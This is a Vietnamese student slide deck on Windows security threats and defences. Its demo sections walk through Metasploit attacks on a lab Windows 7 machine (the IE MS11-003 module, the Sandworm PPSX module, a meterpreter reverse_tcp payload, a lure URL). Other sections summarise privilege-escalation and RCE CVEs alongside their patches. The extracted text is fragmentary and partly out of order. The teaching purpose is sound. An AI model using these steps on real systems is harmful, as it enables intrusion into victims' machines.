Nhận dạng các nguy cơ, điểm yếu và lỗ hổng bảo mật và biện pháp bảo mật trong hệ thống Microsoft Windows

CHỦ ĐỀ: Nhận dạng các nguy cơ, điểm yếu và lỗ hổng bảo mật trong hệ thống Microsoft Windows và các biện pháp đảm bảo an toàn trong hệ thống Microsoft Windows Nguyễn Hoàn Nam Dương PTIT T

CHỦ ĐỀ:

Nhận dạng các nguy cơ, điểm yếu và lỗ hổng bảo mật trong hệ thống Microsoft Windows và các biện pháp đảm bảo an toàn trong hệ thống Microsoft Windows

Nguyễn Hoàn Nam Dương PTIT

THỰC HIỆN:

1 CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ

THỐNG MICROSOFT WINDOWS.

BỘ 3 BẢO MẬT BAO GỒM 3 NGUYÊN TẮC BẢO MẬT CHÍNH:

1 CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG

MICROSOFT WINDOWS.

1 CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG

MICROSOFT WINDOWS.

BẢO MẬT TÍNH BẢO MẬT:

- Thực hiện phương pháp kiểm soát truy cập để kiểm soát ai có thể truy cập

dữ liệu.

- Mã hóa một lớp bảo mật khác để bảo vệ chống mất tính bảo mật.

- Có thể mã hóa các tập riêng lẻ, toàn bộ ổ đĩa cứng và truyển dữ liệu đi qua mạng.

1 CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG

MICROSOFT WINDOWS.

BẢO MẬT TÍNH KHẢ DỤNG:

- Mất tính khả dụng đơn giản là các hệ thống hoặc dữ liệu

không khả dụng khi người dùng cần chúng Một hệ thống

phải hoạt động 24/7

- Đảm bảo rằng các hệ thống vẫn hoạt động bằng cách bảo vệ

chống lại các mối đe dọa khác nhau.

- Một trong mối đe dọa phổ biến nhất là virut, worms, trojan.

- Sao lưu dữ liệu là quan trọng

5

1 CÁC NGUYÊN TẮC BẢO MẬT TRONG HỆ THỐNG

MICROSOFT WINDOWS.

BẢO MẬT TÍNH TOÀN VẸN

- Mất tính toàn vẹn xảy ra khi dữ liệu được sửa đổi mà không

được phép.

- Kiểm soát truy cập hoạt động để đảm bảo rằng những người

được ủy quyền mới có quyền truy cập.

- Ghi nhật kí kiểm tra có thể hiển thị nếu có ai truy cập dữ liệu

và có thể bao gồm các chi tiết họ là ai, và đã làm gì và thời gian

2 PHÂN TÍCH, NHẬN DẠNG CÁC NGUY CƠ, ĐIỂM YẾU VÀ LỖ HỔNG BẢO MẬT TRONG HỆ THỐNG MICROSOFT WINDOWS

2.1 CÁC NGUYÊN NHÂN CÓ THỂ GÂY RA CÁC LỖ

HỔNG BẢO MẬT

 Lỗi của bản thân hệ điều hành ( lỗ hổng hệ thống tệp, lỗ

hổng chế độ tải, lỗ hổng trong các cơ chế quản lý tiến

trình )

 Lỗ hổng từ các phần mềm, dịch vụ đi kèm bản phát hành

của hệ điều hành.

 Người quản trị hệ thống yêu kém không hiểu sâu sắc các

dịch vụ cung cấp, cấu hình không an toàn

 Người sử dụng có ý thức bảo mật kém click vào các đường

2.2 PHÁT HIỆN LỖ HỔNG CỦA HỆ THỐNG THÔNG TIN

 Để phát hiện, xác định và đánh giá các lỗ hổng của

HTTT và loại bỏ chúng, người ta sử dụng các phương

tiện phân tích an toàn.

 Quá trình phát hiện lỗ hổng của HTTT được xây dựng

bằng cách thực hiện kiểm tra thụ động và kiểm tra

thăm dò tích cực (active probe) các lỗ hổng. 

9

2.3 CÁC LOẠI LỖ HỔNG BẢO MẬT

 Lỗ hổng loại C: mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch

vụ, ngưng trệ gián đoạn hệ thống không phá hỏng dữ liệu hoặc đoạt được

quyền truy cập

 Lỗ hổng loại B: mức độ nguy hiểm trung bình thường có trong các ứng dụng

trên hệ thông Lỗ hổng này cho phép người dùng nội bộ có thể chiếm được

quyền cao hơn hay truy cập không hợp pháp

 Lỗ hổng loại A: cảnh báo nguy hiểm cho phép người ngoài hệ thống có thể

truy cập hợp pháp vào hệ thống dẫn đến phá hủy hệ thống Nguyên nhân

của lỗ hổng này thường do quản trị yếu kém Những lỗ hổng này có sẵn

trên phần mềm mà người quản trị không nhận biết

11

 Hoặc phân theo lỗ hổng đã biết, là lỗ hổng đã được công bố, kèm theo các

biện pháp thích hợp để bảo vệ, các bản vá lỗi và bản cập nhật Như vậy,

mỗi khi lỗ hổng được phát hiện thuộc loại này, thì vấn đề cũng coi như đã

được giải quyết

 Lỗ hổng mà chỉ đến thời điểm phát hành bản cập nhật, hoặc phiên bản

mới của sản phẩm, nhà sản xuất mới biết về sự tồn tại của nó do không

đủ thời gian để nghiên cứu và khắc phục sản phẩm đã phát hành, nên các

lỗ hổng loại này được đặt tên là lỗ hổng zero-day, trong suốt thời gian kể

từ thời điểm tồn tại đến khi bị phát hiện, lỗ hổng này có thể đã được khai

thác trong thực tế

3 CÁC BIỆN PHÁP BẢO MẬT CHO MS WINDOWS

3 CÁC BIỆN PHÁP BẢO MẬT CƠ BẢN

• Cài đặt các bản Security Update của hệ điều hành

• Cài đặt các bản Security Update của chương trình

• Cài đặt chương trình bảo mật có uy tín

• Luôn cập nhật các chương trình bảo mật

• Cài đặt ứng dụng Anti-Spyware / Adware / Malware

• Truy cập Internet theo cách an toàn

• Tạo mật khẩu rõ ràng và đảm bảo an toàn đối với từng tài khoản

• Kiểm tra toàn bộ hệ thống thường xuyên theo định kỳ

• Nếu môi trường doanh nghiệp ta nên có các hê thống theo dõi, giám sát để

sẵn sàng xử lý các vấn đề phát sinh

4 DEMO

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

KỊCH BẢN KHAI THÁC MS11_003 :

- Mục tiêu khai thác: Internet Explorer 6,7,8

- Máy Attacker: Kali-Linux

- Máy Victim : Windows 7.

- Bằng cách sử dụng mô-đun Metasploit

ms11_003_ie_css_import trên KaLi.

- Cài đặt và tạo ra một URL trên máy KaLi.

- Đính kèm gửi làm mồi URL cho máy nạn nhân

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 IP KaLi: 192.168.255.130 && IP Victim: 192.168.255.131

 Sử dụng use exploit/windows/browser/ms11_003_ie_css_import

 IP Victim: 192.168.255.131

17

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Sử dụng Msf exploit (ms11_003_ie_css_import)>set payload

windows/meterpreter/reverse_tcp

 Cài đặt các tham số SRVHOST( địa chỉ máy cục bộ) và LHOST.

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Dùng lệnh exploit để chạy và tạo ra 1 URL Copy URL và gửi cho Victim :

19

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Khi nạn nhân click vào đường link được attacker gửi Bên máy Kali sẽ chạy được như hình bên:

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

21

4.1 CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Sau khi khai thác ta sẽ được kết quả:

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

- Máy Attacker : KaLi-Linux

- Máy Victim : Windows 7

- Bằng cách sừ dụng metasploit trên kali tạo ra file PPSX.

- Và chia sẻ cho file PPSX cho máy victim để lừa và mở ra.

23

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Sử dụng: exploit/windows/fileformat/ms14_060_sandworm

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Dùng payload: set payload windows/meterpreter/reverse_tcp

25

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Cài đặt LHOST, UNCPATCH( địa chỉ IP và tên folder được share cho máy victim)

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Chia sẻ file PPSX từ máy Kali đến máy nạn nhân

27

 Bên máy nạn nhân thực thi file ppsx và máy attacker cũng tiến hành khai thác.

4.3 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

29

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Và kết quả đạt được:

4.2 CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

31

GIẢI PHÁP CHO MS11_030 VÀ MS14_060

- Trước hết người dùng không nên mở tập tin power point, các URL từ

nguồn không rõ nguồn gốc vì nó có thể chứa một loạt các phần mềm độc hại.

- Đồng thời bật cảnh báo UAC( User Account Control)

- Cài đặt các bản Security Update của hệ điều hành

- Cài đặt các bản Security Update của chương trình

Có quyền kiểm soát hệ thống, cài đặt chính sách, hiệu chỉnh Registry và nhiều chức năng quản trị khác

Chạy ứng dụng, hiệu chỉnh thông tin tài khoản riêng, lưu file trong thư mục người dùng cá nhân và thực hiện những thao tác đã được cấp phép bởi admin Người dùng sẽ bị hạn chế thực hiện thay đổi trên hệ thống.

4.3 CVE-2018-8440 – NGUY CƠ LỖ

HỔNG

 Công bố: 26/8/2018

 Hẹn giờ tác vụ (Task Scheduler) là tính năng của Windows

Microsoft cho phép hẹn giờ khởi động các chương trình tại thời điểm cài sẵn Interface ALPC của Task Scheduler là một thành phần trung gian truyền tin của các phần trong Windows OS.

 Hàm API SchRpcSetSecurity của APLC không kiểm soát được quyền cho phép nên hacker có thể bằng cánh nào đó thay đổi hàm đó để chiếm quyền cao hơn như một NT AUTHORITY \ System

 PoC này sẽ ghi đè lên một DLL (dynamic link library) liên quan đến máy in và sử dụng nó như một phương tiện để khai thác nếu thành công thì kẻ tấn công sẽ gọi được một DLL dưới quyền NT AUTHORITY\SYSTEM (thông qua tiến trình spoolersv).

 Việc chọn tiến trình spoolsv.exe này vì tiến trình này dễ khai thác và không phải

code quá nhiều.

4.3 CVE-2018-8440 – PHÁT HIỆN VÀ HẠN CHẾ LỖ

HỔNG

 Dùng công cụ process explorer hoặc Microsoft Sysmon để theo dõi tiến

trình spoolsv.exe đang chạy.

 Sữ dụng công cụ HitManPro, Update security version mới nhất và Windows

defender hoặc phần mềm diệt virus chuyên dụng Update bản vá lỗi mới nhất

 Hạn chế truy cập đến Command Prompt (CMD) áp dụng cho các tài khoản

thông thường

 Sử dụng Group Policy để chặn Command Prompt (CMD) trên toàn bộ các Tài

khoản thuộc Domain (Active Directory)

4.4 CVE-2015-1701 – WIN32K ELEVATION OF

PRIVILEGE VULNERABILITY.

• Công bố 18-5-2015

• Lỗ hổng tồn tại khi Win32k.sys kernel-mode driver xử

lý object không đúng trong copy image funtion Hacker

có thể chạy code tùy ý trong chế độ kernel để sữ dụng quyền system làm thay đổi, cài đặt , thêm xóa hay

thao tác với đầy đủ quyền của tài khoản SYSTEM mặc định trong hệ thông

• Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, 8.1, and 2012 R2.

4.4 CVE-2015-1701 – KHAI THÁC

1 Đăng kí window class gọi

API CreateWindow/CreateWindow

Ex

2 APIs họi đến dịch vụ NtUserCreateWindowEx

NtUserCreateWindowEx

3 Đổi sang user mode gọi copy image

function

Kernel mode User mode

4 Copy image function

chuyển sang kernel mode 5 Gán, thực hiện, biên dịch window với

quyền, đối tượng trong window class

4 Gọi SetWindowLongPtr với

tham số DefWindowProc

5 Flag Server Side Window Proc được bật, thực thi với quyền system trong kernel mode

4.4 CVE-2015-1701 – PHÁT HIỆN VÀ HẠN CHẾ LỖ HỔNG

 Dùng công cụ process explorer hoặc Microsoft Sysmon để theo dõi tiến

trình spoolsv.exe đang chạy

 Update bản vá lỗi mới nhất.

 Hạn chế quyền thực thi của Standard User đối với những khu vực nhạy

cảm

Lỗi này được khai thác bằng cách tạo tệp RTF độc hại mà khi

mở trong các phiên bản Microsoft Word có lỗi này sẽ dẫn đến

việc thực thi mã code độc hại đó.

Lỗi này được tìm thấy từ tháng 4 năm 2014.

4.5 MS14-017 MICROSOFT WORD RTF OBJECT CONFUSION

Tài liệu tham khảo:

 Lỗi này khai thác lỗ hổng trong Windows Media Center. 

 Bằng cách cung cấp đường dẫn UNC trong tệp * mcl, một tệp

từ xa sẽ được tải xuống tự động, điều này có thể dẫn đến việc thực thi mã tùy ý.

43

4.6 MS15-100 MICROSOFT WINDOWS MEDIA CENTER MCL

VULNERABILITY

4.7 MS12-020

Vulnerabilities in Remote Desktop Could Allow Remote

Code Execution

45

4.7.1.GIỚI THIỆU

• Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol

(Exec Code và Dos).Lỗ hỏng cho phép thực thi các mã từ xa nếu

một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với

một hệ thống bị ảnh hưởng

• Theo mặc định thì tất cả các máy không cho phép dịch vụ Remote

Desktop sẽ không bị lỗi này

Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista Service Pack 2

Windows Vista x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for Itanium-based Systems Service Pack 2

Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1

Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1

Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1

Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based

Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based

Systems Service Pack

1

Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itani

um-based Systems Service Pack 1

Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itani

4.7.2.CÁCH KHẮC PHỤC

 Tìm kiếm bản vá:

 Win 7 bản vá cho lỗi KB2667402

 Win XP bản vá cho lỗi KB2621440

 Tắt dịch vụ Remote Desktop trên máy tính

4.8 MS10-046

Vulnerability in Windows Shell Could Allow Remote

Code Execution

49

4.8.1 GIỚI THIỆU

 Đây là một lỗi rất nghiêm trọng liên quan đến Window Shell của tất cả các

hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công chiếm lấy toàn quyền

điều khiển Window và thực thi các mã nguồn từ xa Lỗi này được phát hiện

vào tháng 6/2010 và tháng 8/2010,Microsoft đã tung ba bản và lỗi

 Lỗi nguy hiểm này nằm trong tập tin “shortcut”(*.lnk) của Window Bằng

cách tạo ra một tập tin shortcut nhúng mã độc, tin tắc có thể tự động thực

thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư

mục chứa tập tin này

 Windows XP Service Pack 3

 Windows XP Professional x64 Edition Service Pack 2

 Windows Server 2003 Service Pack 2

 Windows Server 2003 x64 Edition Service Pack 2

 Windows Server 2003 with SP2 for Itanium-based Systems

 Windows Vista Service Pack 1 and Windows Vista Service Pack 2

 Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition

Service Pack 2

 Windows Server 2008 for bit Systems and Windows Server 2008 for

32-bit Systems Service Pack 2

 Windows Server 2008 for x64-based Systems and Windows Server 2008 for

x64-based Systems Service Pack 2

 Windows Server 2008 for Itanium-based Systems and Windows Server 2008

for Itanium-based Systems Service Pack 2

 Windows 7 for 32-bit Systems

 Windows 7 for x64-based Systems

 Windows Server 2008 R2 for x64-based Systems

 Windows Server 2008 R2 for Itanium-based Systems

51

4.8.2 CÁCH KHẮC PHỤC

 Thường xuyên chạy các bản vá của Window để tránh bị hacker lợi dụng

 Bản và lỗi có tên mã là KB2286198

4.9 LNK REMOTE CODE EXECUTION VULNERABILITY

4.9 LNK REMOTE CODE EXECUTION VULNERABILITY

(CVE-2017-8464 )

file LNK được hiển thị và xử lý.

Windows Control Panel, khi windows mở tệp lnk (hoặc pif) được tạo thủ công, nó sẽ tải tệp dll được chỉ định trong tệp Lnk

mà không có bất kỳ kiểm tra, mà làm cho các mã độc hại trong file dll được thực hiện

4.9 LNK REMOTE CODE EXECUTION VULNERABILITY

(CVE-2017-8464 )

một folder chứa file LNK và đi kèm với một file dll Khi người dùng mở usb, hoặc mở share folder ra, lập tức sẽ bị lây nhiễm

sẽ tự động thâm nhập vào máy tính ngay cả khi chức năng Autorun

đã bị vô hiệu hóa Từ đó, hacker có thể chiếm toàn quyền điều khiển máy tính để thực hiện hành vi ăn cắp thông tin, phá hủy dữ liệu dựa vào file DLL.

55

4.9 LNK REMOTE CODE EXECUTION VULNERABILITY

(CVE-2017-8464 )

 Hacker khai thác thành công lỗ hổng này có thể có được quyền người dùng giống như người dung local trên máy tính lỗ hổng cũng có thể bị khai thác từ việc chia sẻ mạng, hay chia sẻ dạng WebDAV

 Những hệ điều hành từ Windows XP trở về sau đều bị ảnh hưởng bởi lỗi trên, kể cả Winserver 2016 và Windows 10

4.9 LNK REMOTE CODE EXECUTION VULNERABILITY

(CVE-2017-8464 )

 Cách hạn chế :

 Tắt tính năng Autoplay, Autorun trên Window, quét USB trước khi thực hiện bất cứ một thao tác nào.

 Vô hiệu hóa tính năng tự động tải về trên các trình duyệt.

 Trên server nên cấu hình sử dụng local mức user thường

 Sử dụng phần mềm Antivirus và cập nhật cơ sở liên tục giúp phát hiện các malware khi mà usb cấm vào.

 Cập nhật các bản vá mới nhất và sử dụng bản cơ sở dữ liệu virus mới nhất cho Windows Defender

57

4.10 LỔ HỔNG ETERNALBLUE MS17_010

phổ biến trên các hệ điều hành window, trước khi phát hiện lổ

hổng, gần như mặc định khi dùng các nền tảng Windows

giao thức SMB (Server Message Block) của Microsoft thông qua

Lỗ hổng tồn tại trong giao thức SMBv1, máy tính window

SMBv1 kích hoạt mặc định sẽ dùng gói tin SMBcủa kẻ tấn công

và cho phép họ thực thi đoạn mã ngẫu nhiên trên máy tính người

dùng.